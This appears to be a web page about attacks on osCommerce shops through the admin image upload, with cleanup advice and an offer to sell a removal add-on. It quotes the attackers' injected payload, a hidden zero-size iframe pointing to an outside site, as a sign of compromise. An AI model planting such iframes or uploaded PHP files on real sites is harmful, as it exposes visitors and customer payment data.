OSCommerce Hackaway

There has been a recent increase of attacks on OSComerce websites. Hackers exploit a vulnerability in the admin pages that is usually used for uploading product pictures to the /images directory. Several PHP files are uploaded there and are then executed. Server information such as the database configuration and sometimes credit card orders are displayed and captured.

Sometimes traces are left by the hacker. PHP files show up in the images directory (though sometimes they're deleted after being run). Often, the following code is added to every product_description and categories_description

<iframe src="http://www.vcp-counter.com/unique/index.php" width=0 height=0 frameborder=0></iframe>

What Should I do?

The exploit cannot be run on sites where the admin directory is password protected. If you use your Webserver Control Panel to set up username/password (Basic Authentication) on the admin directory, you can get your browser to remember the username and password for you so it's not onerous logging in, but you'll be safe from further exploits using this method.

Of course, if there's PHP files left in your images directory, the hacker could come back and run them to get your customer orders again - DELETE THEM!

Change the passwords for your FTP and your mysql database. You should normally be able to do this in your website control panel.

Finally, antivirus software may report MALWARE on your website if you leave the iframe HTML in your database. Simply edit every entry manually to remove it..... Easier said than done I know. That's why I've written PHP software which will do the job for you. The code you get when you click a purchase button below checks your images directory for PHP files and then allows you to delete them. It also checks your database for IFRAME tags and will allow you to automatically remove it from every database entry.

Click Buy Now to purchase the addon to install onto your site. It's very simple to install and configure and was written with instructions for OSC MS2.2 RC2 but has also been integrated with CRELoaded. Or choose the install option to have us do it all for you.


The process isn't automatic. You'll be sent an email by a real person and you can converse by email if you have problems or questions. Please allow extra time if ordering in the evening or weekend (UK time - currently 11:32am.) If you pay for Install, there is no guarantee given about when the work can be done, but if you're unhappy, you'll get a refund.


featured website
Cycle Sports

Cycle Sports

Customisation of this OSCommerce site